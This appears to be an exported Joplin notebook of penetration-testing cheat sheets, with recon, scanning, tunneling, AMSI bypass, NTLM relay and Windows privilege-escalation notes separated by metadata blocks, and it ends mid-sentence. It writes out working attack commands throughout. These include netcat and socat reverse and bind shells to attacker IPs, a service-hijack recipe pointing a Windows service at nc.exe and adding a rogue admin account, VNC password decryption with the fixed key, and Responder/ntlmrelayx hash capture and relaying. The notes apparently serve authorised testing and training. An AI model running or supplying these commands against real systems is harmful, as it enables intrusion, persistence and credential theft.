$names = $listsoftware |foreach-object {Get-ItemProperty $_.PsPath}

foreach ($name in $names)
{
    Write-Host $name.Displayname
}
```

## WMI:

- ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt ```

## Reviewing Installed Windows Features

- ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}```

# Wmic 

## Note: Microsoft has planned to deprecrate this program in new versions of Windows. The commands used can be slow to run but it will return the results it needed:

- wmic /output:C:\InstalledSoftwareList.txt product get name,version

## Saving it to a text file:

- wmic product get name,version /format:csv > C:\InstalledSoftware.csv

id: 6d908deedb07498dbad8aa648e5f4ef3
parent_id: 45b2694a52b149c982a159cccb1c6a2b
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132650
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 16e21eef85940449da0066ac1fe913ce6.md000644 0000006334 14666154175012637 0ustar00000000 000000 DNS Hostname Discovery


# DNS Discovery

DNSRecon: 

- dnsrecon -d www.example.com -a 
- dnsrecon -d www.example.com -t axfr
- dnsrecon -d <startIP-endIP>
- dnsrecon -d www.example.com -D <namelist> -t brt

Dig: 

- dig www.example.com + short
- dig www.example.com MX
- dig www.example.com NS
- dig www.example.com> SOA
- dig www.example.com ANY +noall +answer
- dig -x www.example.com
- dig -4 www.example.com (For IPv4)
- dig -6 www.example.com (For IPv6)
- dig www.example.com mx +noall +answer example.com ns +noall +answer
- dig -t AXFR www.example.com

Dnsenum Enumeration:

- dnsenum --dnsserver 172.21.0.0 -enum intranet.megacorpone.xx
- dnsenum --dnsserver 172.21.0.0 -enum management.megacorpone.xx
- dnsenum --dnsserver 172.21.0.0 -enum www.megacorpone.xx

dnsX Enumeration: 
- dnsx -l domains.txt -resp -a -aaaa -cname -mx -ns -soa -txt
- dnsx -silent -d megacorpone.com -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt

Using with subfinder: 
- subfinder -silent -d megacorpone.com | dnsx -silent
- subfinder -silent -d megacorpone.com | dnsx -silent -a -resp
- subfinder -silent -d megacorpone.com | dnsx -silent -a -resp-only
- subfinder -silent -d megacorpone.com | dnsx -silent -cname -resp
- subfinder -silent -d megacorpone.com | dnsx -silent -asn 


Nmap Enumeration: 
```
$ ls -lh /usr/share/nmap/scripts/ | grep dns
-rw-r--r-- 1 root root 1.5K Nov  1  2023 broadcast-dns-service-discovery.nse
-rw-r--r-- 1 root root 5.3K Nov  1  2023 dns-blacklist.nse
-rw-r--r-- 1 root root 9.9K Nov  1  2023 dns-brute.nse
-rw-r--r-- 1 root root 6.5K Nov  1  2023 dns-cache-snoop.nse
-rw-r--r-- 1 root root  15K Nov  1  2023 dns-check-zone.nse
-rw-r--r-- 1 root root  15K Nov  1  2023 dns-client-subnet-scan.nse
-rw-r--r-- 1 root root  10K Nov  1  2023 dns-fuzz.nse
-rw-r--r-- 1 root root 3.8K Nov  1  2023 dns-ip6-arpa-scan.nse
-rw-r--r-- 1 root root  13K Nov  1  2023 dns-nsec3-enum.nse
-rw-r--r-- 1 root root  11K Nov  1  2023 dns-nsec-enum.nse
-rw-r--r-- 1 root root 3.4K Nov  1  2023 dns-nsid.nse
-rw-r--r-- 1 root root 4.3K Nov  1  2023 dns-random-srcport.nse
-rw-r--r-- 1 root root 4.3K Nov  1  2023 dns-random-txid.nse
-rw-r--r-- 1 root root 1.5K Nov  1  2023 dns-recursion.nse
-rw-r--r-- 1 root root 2.2K Nov  1  2023 dns-service-discovery.nse
-rw-r--r-- 1 root root 5.6K Nov  1  2023 dns-srv-enum.nse
-rw-r--r-- 1 root root 5.7K Nov  1  2023 dns-update.nse
-rw-r--r-- 1 root root 2.1K Nov  1  2023 dns-zeustracker.nse
-rw-r--r-- 1 root root  26K Nov  1  2023 dns-zone-transfer.nse
-rw-r--r-- 1 root root 3.9K Nov  1  2023 fcrdns.nse
```
-nmap x.x.x.x -v -p 53 --script=exampleScript1.nse,exampleScript2.nse





id: 6e21eef85940449da0066ac1fe913ce6
parent_id: 204bf6446e68480f8aa4bc2e58bca732
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T05:36:18.851Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486131997
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T05:36:18.851Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1729926ecd3684d6fa271e50fceb6dad9.md000644 0000000604 14666154175013005 0ustar00000000 000000 Templates

id: 729926ecd3684d6fa271e50fceb6dad9
created_time: 2024-09-04T21:42:12.957Z
updated_time: 2024-09-04T21:42:12.957Z
user_created_time: 2024-09-04T21:42:12.957Z
user_updated_time: 2024-09-04T21:42:12.957Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 52f66871b34d45fd9381134f08d8eee4
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 27ac8ce32e1064dd991162dacbb6a6f3a.md000644 0000003410 14666154175013031 0ustar00000000 000000 Other Scanners

# Unicornscan: 
- unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69

# Netcat
```
#!/bin/bash
for i in {0..255}; do
    for j in {0..255};do
        for k in {0..65535};do
            nc -v -z -n -w 1 10.100.${i}.${j} ${k} >> nc_port_scan.txt
        done
    done
done
```

# Naabu

Source: https://github.com/projectdiscovery/naabu

## Installing Naabu: 

Latest: 
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
 
 In Kali Linux: 
 sudo apt install naabu
 
 ## Using Naabu: 
 - naabu -host megacorpone.com
 - naabu -p 80,443,21-23,u:53 -host megacorpone.com
 - naabu -p - -exclude-ports 80,443 -host megacorpone.com
 - naabu -host megacorpone.com -json

# Rustscan
source: 
- rustscan --ip 172.21.0.0 --ports  80,443,21-23 --tcp
- rustscan --ip 172.21.0.0 --ports  80,443,21-23 --udp
- rustscan --range 172.21.0.0-172.21.0.254 --ports 1-65535 --tcp
- rustscan --range 172.21.0.0-172.21.0.254 --ports 1-65535 --tcp --exclude-ips 172.21.0.128
- rustscan --subnet target-subnet --ports <port_range> --tcp
- rustscan --ip host--ports post-range --tcp -t <number-of-threads>


id: 7ac8ce32e1064dd991162dacbb6a6f3a
parent_id: 008bf10b237d494db05d2270f21864df
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-06T02:22:49.324Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132041
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-06T02:22:49.324Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 17b7c6aedc09c4765877ef430c7c267db.md000644 0000000616 14666154175012731 0ustar00000000 000000 Files on the System

id: 7b7c6aedc09c4765877ef430c7c267db
created_time: 2024-09-04T21:42:12.546Z
updated_time: 2024-09-04T21:57:56.768Z
user_created_time: 2024-09-04T21:42:12.546Z
user_updated_time: 2024-09-04T21:57:56.768Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 27c2da97275714c1baba67c3cee911484.md000644 0000002323 14666154175012624 0ustar00000000 000000 4. Netcat Tips

## Fundamentals:

Connect to a netcat client:
- rlwrap nc [IP Address] [port]

Connect to a netcat Listener:

- rlwrap nc -lvp [Localport]

More info on rlwrap: https://linux.die.net/man/1/rlwrap

## Backdoor Shells: 

Linux: 

- rlwrap nc [Your IP Address] -e /bin/sh 
- rlwrap nc [Your IP Address] -e /bin/bash
- rlwrap nc [Your IP Address] -e /bin/zsh
- rlwrap nc [Your IP Address] -e /bin/ash


Windows: 

- rlwrap nc -lv [localport] -e cmd.exe

Linux netcat reverse shell: 

- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f

id: 7c2da97275714c1baba67c3cee911484
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132461
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 17d5812523230431f89a6c4e6b0afa79e.md000644 0000002667 14666154175012500 0ustar00000000 000000 8. Bypass Windows Amsi

## Testing for Amsi Bypass:

- https://github.com/rasta-mouse/AmsiScanBufferBypass

## Amsi-Bypass-PowerShell

- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

## using evil-winrm

When you have a winrm shell with evil-winrm you can use the bypass amsi module to bypass amsi detection's on your target: 

```
evil-winrm -i 172.16.1.1 -u afsimmons -p "" -e /opt/privesc
Bypass-4MSI
menu
Invoke-Binary /opt/privesc/SharpHound.exe
```

## Resources:

- https://blog.f-secure.com/hunting-for-amsi-bypasses/
- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
- https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
- https://slaeryan.github.io/posts/falcon-zero-alpha.html
- https://www.hackingarticles.in/a-detailed-guide-on-amsi-bypass/

id: 7d5812523230431f89a6c4e6b0afa79e
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-08-01T20:46:08.367Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132489
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-08-01T20:46:08.367Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 17e03b16c7d6147afbf92982cfa758c8a.md000644 0000005025 14666154175012725 0ustar00000000 000000 Linux

# Check if your tunnel is active and running: 

- nc -z localhost port || echo 'no tunnel open'
- netstat -lpnt | grep port | grep ssh
- ps aux | grep ssh
- ss -ntlp

# SSH Tunneling

Note: Target must have SSH running for there service

1. Create SSH Tunnel: ssh -D localhost:local port -f -N user@localhost -p Target Port
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
3. Add the following line into the config: Socks5 127.0.0.1 Local Port
4. Run commands through the tunnel: proxychains command

# SShuttle

In Kali

Source: https://github.com/sshuttle/sshuttle

- sshuttle -r root@172.21.0.0 10.2.2.0/24
- sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd 'ssh -i ./id_rsa' # Daemon mode
- sshuttle -D --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem' # Daemon mode with DNS
- Working with your .ssh/config:
```
sshuttle --dns -vr user@server 0/0 --ssh-cmd 'ssh jumpbox'
sshuttle --dns -r myserver 0/0 -x <server-IP>
```

# Socat

## Bind Shell

```
victim> socat TCP-LISTEN:443,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:443
```

## Reverse Shell

```
attacker> socat TCP-LISTEN:443,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:443 EXEC:bash,pty,stderr,setsid,sigint,sane
```

# Port Forwarder
1. mknod pivot p
2. nc -l -p < port to listen on> 0<pivot | nc "target" "pivot-port" 1>pivot

# reGeorg

Source: https://github.com/sensepost/reGeorg

Note: reGeorg requires Python 2.7 and the following modules:

urllib3 - HTTP library with thread-safe connection pooling, file post, and more.

1. Upload tunnel.(aspx|ashx|jsp|php) to a webserver
2. Configure the tool to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py
```
python reGeorgSocksProxy.py -p 8080 -u http://upload.megacorpone.net:8080/tunnel/tunnel.jsp
```

id: 7e03b16c7d6147afbf92982cfa758c8a
parent_id: 4869250b5e7045b3ae62e7b6f02cac08
created_time: 2024-08-06T04:29:24.848Z
updated_time: 2024-08-07T05:33:31.429Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132054
user_created_time: 2024-08-06T04:29:24.848Z
user_updated_time: 2024-08-07T05:33:31.429Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 17e3427d422d8469c9aa6426335549b7d.md000644 0000006651 14666154175012355 0ustar00000000 000000 1. Certificate template breakdown

# Certificate Attributes

Analyzing certificate attributes that are in the template: 

```
     Value                            Definition
     
pkicertificatetemplate        -->  	   Specify the template’s schema version
mspki-enrollment-flag         -->  	   Specifies enrollment flags (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/ec71fd43-61c2-407b-83c9-b52272dec8a1)
mspki-ra-signature            -->  	   Specifies the number of enrollment registration authority signatures that are required in an enrollment request
mspki-certificate-name-flag    -->  	   Specifies the subject name flags (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/1192823c-d839-4bc3-9b6b-fa8c53507ae1)
```

Reviewing Object Identifiers to understand how the certificates are being used: 

```
Usages (EKUs - pkiextendedkeyusage Attribute) : 

     Value                      Definition

1.3.6.1.5.5.7.3.3        -->  	Code Signing                                             
1.3.6.1.4.1.311.10.3.4   -->   	Encrypting File System                                   
1.3.6.1.5.5.7.3.4        -->   	Encrypting Mail                                          
1.3.6.1.4.1.311.20.2.2   -->   	Smart Card Logon                                         
1.3.6.1.5.5.7.3.2        -->    Authentication to another server                         
1.3.6.1.5.2.3.4          -->   	PKINIT Client Authentication (Needs to be added manually)
1.3.6.1.5.5.7.3          -->   	Server Authentication (Identifying servers)              					
2.5.29.37.0              -->    One or more purposes for which the certified public key may be used            
```

# Certificate Enrollment

## DNS Requirements:

Attributes: (CT_FLAG_SUBJECT_ALT_REQUIRE_DNS or CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS)

- Only accounts with the `dNSHostName` attribute set can enroll.
- Active Directory users **cannot** enroll in certificate templates that require a `dNSHostName`.
- Computers get their `dNSHostName` attribute set when they are joined to a domain. However, this attribute remains empty if a computer object is simply created in Active Directory.
- Computers can add a DNS name matching their computer name since they have validated write access to their `dNSHostName` attribute.

## Email Requirements:

Attributes: (CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL or CT_FLAG_SUBJECT_REQUIRE_EMAIL)

- Only accounts with the `mail` attribute set can enroll unless the template is of schema version 1.
- By default, users and computers do not have the `mail` attribute set and cannot modify this attribute themselves.
- Users might have the `mail` attribute set, but it is uncommon for computers.

# Resources: 
- https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/main/README.md#heading5



id: 7e3427d422d8469c9aa6426335549b7d
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-12T16:33:13.008Z
updated_time: 2024-08-30T18:29:19.740Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132199
user_created_time: 2024-08-12T16:33:13.008Z
user_updated_time: 2024-08-30T18:29:19.740Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 180f2dd0ab37646999e62d85cc6249f38.md000644 0000002666 14666154175012530 0ustar00000000 000000 Wordlists

## Local in Kali: 

/usr/share/wordlists

## Other Resources:

Have I been Pwned

- https://haveibeenpwned.com/Passwords

Seclists: 

- In Kali: apt install seclists
- Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames
- Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords

Crackstation's Dictionary List: 

- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

Rainbow Tables (Rainbow Crack):

- http://project-rainbowcrack.com/table.htm

Rocktastic Mega Wordlist:

- https://labs.nettitude.com/tools/rocktastic/

berzerk0 wordlist: 

- https://www.hack3r.com/forum-topic/wikipedia-wordlist

Weakpass: 

- https://www.hack3r.com/forum-topic/wikipedia-wordlist

Tools to make your own wordlists: 

- Crunch
- Cewl

id: 80f2dd0ab37646999e62d85cc6249f38
parent_id: f5b6f52827df4dfd8523222cd85dcaa6
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132873
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 184c59c9aa72543988aa2efcadf7f9257.md000644 0000003777 14666154175012754 0ustar00000000 000000 VNC Passwords

# Windows

Location paths for VNC passwords:

```
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
HKEY_CURRENT_USER\Software\TightVNC\Server
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
C:\Program Files\UltraVNC\ultravnc.ini
```

Use Case: 

```
C:\Windows\system32>reg query HKLM\SOFTWARE\TightVNC\Server /s

HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server
--- SNIP ---
    Password    REG_BINARY    D7A514D8C556AADE
    ControlPassword    REG_BINARY    1B8167BC0099C7DC
--- SNIP ---
```

# Linux

If you obtain access to a linux system that is running a vnc service, search through the users .vnc directory. In the .vnc directory you may find a passwd file. To decrypt the password file, run the following command: 

```
cat .vnc/passwd | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d
```

```
echo -n "vnc-hash" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
```

# Other ways to decrypt VNC Passwords

## Metasploit

```
$> msfconsole

msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
 => "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
 => true
>> Rex::Proto::RFB::Cipher.decrypt ["D7A514D8C556AADE"].pack('H*'), fixedkey
 => "Secure!\x00"
>> 
```


Source: 
- https://github.com/frizb/PasswordDecrypts

id: 84c59c9aa72543988aa2efcadf7f9257
parent_id: f5b6f52827df4dfd8523222cd85dcaa6
created_time: 2024-08-07T16:53:23.897Z
updated_time: 2024-08-07T16:58:58.781Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132868
user_created_time: 2024-08-07T16:53:23.897Z
user_updated_time: 2024-08-07T16:58:58.781Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1872dcb7151b445778a202e7dc4ee957b.md000644 0000010206 14666154175012555 0ustar00000000 000000 Responder

# Source: 

https://github.com/lgandx/Responder

# Tools in Responder: 

Location: /usr/share/Responder/tools

# Make changes to config to turn off services:

`nano /usr/share/responder/Responder.conf`

# Configuring MultiRelay: 
In Kali Linux: 
1. pip install pycryptodome
2. Install Mingw and create multi relay binaries:
```
sudo apt-get install gcc-mingw-w64-x86-64
sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv
sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode
```
4. python3 MultiRelay.py
```
Usage: 
responder-MultiRelay -t 10.20.30.40 -u Administrator lgandx admin
responder-MultiRelay -t 10.20.30.40 -u ALL

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -t 10.20.30.45        Target server for SMB relay.
  -p 8081               Additional port to listen on, this will relay for
                        proxy, http and webdav incoming packets.
  -u, --UserToRelay     Users to relay. Use '-u ALL' to relay all users.
  -c whoami, --command=whoami
                        Single command to run (scripting)
  -d, --dump            Dump hashes (scripting)
```


# Starting Responder:

- responder -I [Interface] -A
- responder -I [Interface] -i [IP Address] or -e [External IP] -A

## Starting Responder in Basic Authentication Mode
- responder -I [Interface] -wdF -b

## Force NTLM Authentication to version 1 instead of version 2:
- responder -I [Interface] -wdF --lm --disable-ess

## External IP Poisoning
- responder -I [Interface] -e 172.21.1.2

## DNS Injection in DHCP Responses
- responder -i [interface] -D

# Using Responder-RunFinger to verify if SMB Signing is not enabled

- responder-RunFinger -i 172.21.0.0/24
- python3 RunFinger.py -i 172.21.0.0/24

# Using Responder-MultiRelay
Tips:
Multirelay uses the default version of mimikatz and it can easily flagged by AV. It is recommend to compile your own custom version and use it with mutlirelay.
Do not run multirelay against targets that have smb message_signing enabled:

- responder-Multirelay -t 172.21.0.0 - u ALL
- python3 Multirelay.py -t 172.21.0.0 -u ALL

# Using Responder with Impacket-Ntlmrelayx
NtlmRelayX is an impacket script that allows you to conduct NTLM Relay Attacks, by creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).

1. When you are using responder to capture challenges and relay them to ntlmrelayx you will need to turn off HTTP and SMB in the responder.conf file. Also have a list of what systems are running smb and have smb signing disabled.

2. Set up a socks proxy on port 1080. This socks proxy will successfully relay the traffic to ntlmrelayx. 
- sudo nano /etc/proxychains4.conf
```
[ProxyList]
# NtlmRelayX Socks Proxy
socks4 127.0.0.1 1080
# Other Proxies
```
3. Run Responder and NtlmRelayX to watch the magic happen:
- sudo Responder -I [Interface]
- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt
- ntlmrelayx.py -socks -smb2support -tf smb-targets.txt

To view a full list of captured sessions from NtlmRelayX
```
ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       172.21.48.38   SPAWN/MSIMMONS            445
SMB       172.21.48.230  FAERIE/ADMINISTRATOR      445
SMB       172.21.48.230  FAERIE/ALSIMMONS          445
```

# References: 

- https://github.com/lgandx/Responder




id: 872dcb7151b445778a202e7dc4ee957b
parent_id: ab4c6b72385d4d8db33ad00069267585
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132140
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 18b8e0b0e3d554f0aa756ac0d52059b7b.md000644 0000001442 14666154175012672 0ustar00000000 000000 General Notes Windows

# Windows: 

- schtasks

## Impacket: 

- python3 atexec.py Domain/Administrator:<Password>@123@172.21.0.0 systeminfo



id: 8b8e0b0e3d554f0aa756ac0d52059b7b
parent_id: f497f09817204252a2bcf9c1fb249673
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-08-01T20:37:40.780Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132738
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-08-01T20:37:40.780Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 18c20bbcfbed44eeabd60d3f5a7b1a6bd.md000644 0000004122 14666154175013401 0ustar00000000 000000 General Notes

# Editable Service

If you find a service that is editable (WinPEAS can help here to find such services) you can edit the binpath to point to nc.exe to get a reverse shell. 

Steps also described here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc

Note: in both my experiences using this, this does get shell, but it closes in a few seconds.

  1. Upload `nc.exe` to a writable directory.
  2. `sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv <kali_IP> 9988 -e C:\Windows\System32\cmd.exe"`
  3. `sc config usosvc  obj= ".\LocalSystem" password= ""`
     - I didn't need this second time using it
  5. `sc config usosvc start= "demand"`
  6. `nc -lvp 9988` (setup listener on kali)
  7. `net start usosvc`
  8. R00T!
	
Since shell closes soon, add new admin user:
1. `net user hacker h@ck3r%93 /add`
2. `net localgroup administrators hacker /add`

Now RDP/ssh with new creds (if services are available, or you can open them yourself):
1. `rdesktop <target>`
2. R00T!

The shell closes due to a Windows timeout variable in the registry that defines how long to wait for a service to response. If you're in a position to edit that (i.e. ssh/rdp not enabled) this would stabilize the shell.
If you don’t want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH.

id: 8c20bbcfbed44eeabd60d3f5a7b1a6bd
parent_id: ea863b45ee66498c905dbf16b0eac900
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132536
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 18e90988aa8fd453bbf745cda12baea68.md000644 0000007164 14666154175013067 0ustar00000000 000000 Pretender

# Source: https://github.com/RedTeamPentesting/pretender

# Installation

## In Kali: 
- git clone https://github.com/RedTeamPentesting/pretender
- go build
- pretender --help

## Using Pretender: 
- pretender -i eth0
- pretender -i eth0 --dry (Only logs incoming queries and does not answer any of them)
- pretender -i eth0 --dry --no-ra # without router advertisements

## Options to disabled certain attacks:

--no-dhcp-dns
--no-lnr
--no-mdns
--no-llmnr
--no-netbios
--no-ra

## Tips

- Make sure to enable IPv6 support in `ntlmrelayx.py` with the `-6` flag
- Pretender can be configured to stop after a certain time period for situations
  where it cannot be aborted manually (`--stop-after` and
  `main.vendorStopAfter`)
- Host info lookup (which relies on the ARP table, IP neighbours and reverse
  lookups) can be disabled with `--no-host-info` or `main.vendorNoHostInfo`
- If you are not sure which interface to choose (especially on Windows), list
  all interfaces with names and addresses using `--interfaces`
- If you want to exclude hosts from local name resolution spoofing, make sure to
  also exclude their IPv6 addresses or use
  `--no-ipv6-lnr`/`main.vendorNoIPv6LNR`
- DHCPv6 messages usually contain a FQDN option (which can also sometimes
  contain a hostname which is not a FQDN). This option is used to filter out
  messages by hostname (`--spoof-for`/`--dont-spoof-for`). You can decide what
  to do with DHCPv6 messages without FQDN option by setting or omitting
  `--ignore-nofqdn`
- Depending on the build configuration, either the operating system resolver
  (`CGO_ENABLED=1`) or a Go implementation (`CGO_ENABLED=0`) is used. This can
  be important for host info collection because the OS resolver may support
  local name resolution and the Go implementation does not, unless a stub
  resolver is used.
- The host info functionality is currently only available for Windows and Linux.
- A custom MAC address vendor list can be compiled into the binary by replacing
  the default list `hostinfo/mac-vendors.txt`. Only lines with MAC prefixes in
  the following format are recognized: `FF:FF:FF<tab>VendorID<tab>Vendor` (the
  MAC prefix length can be arbitrary).
- If you only want to perform Kerberos relaying you can specify `--no-lnr` and
  `--spoof-types SOA` to ignore any queries that are unrelated to the attack.
- When conducting a Kerberos relay attack where `krbrelayx.py` runs on a
  different host than pretender (relay IPv4 address points to different host
  that runs `krbrelayx.py`), the host running `krbrelayx.py` will also need to
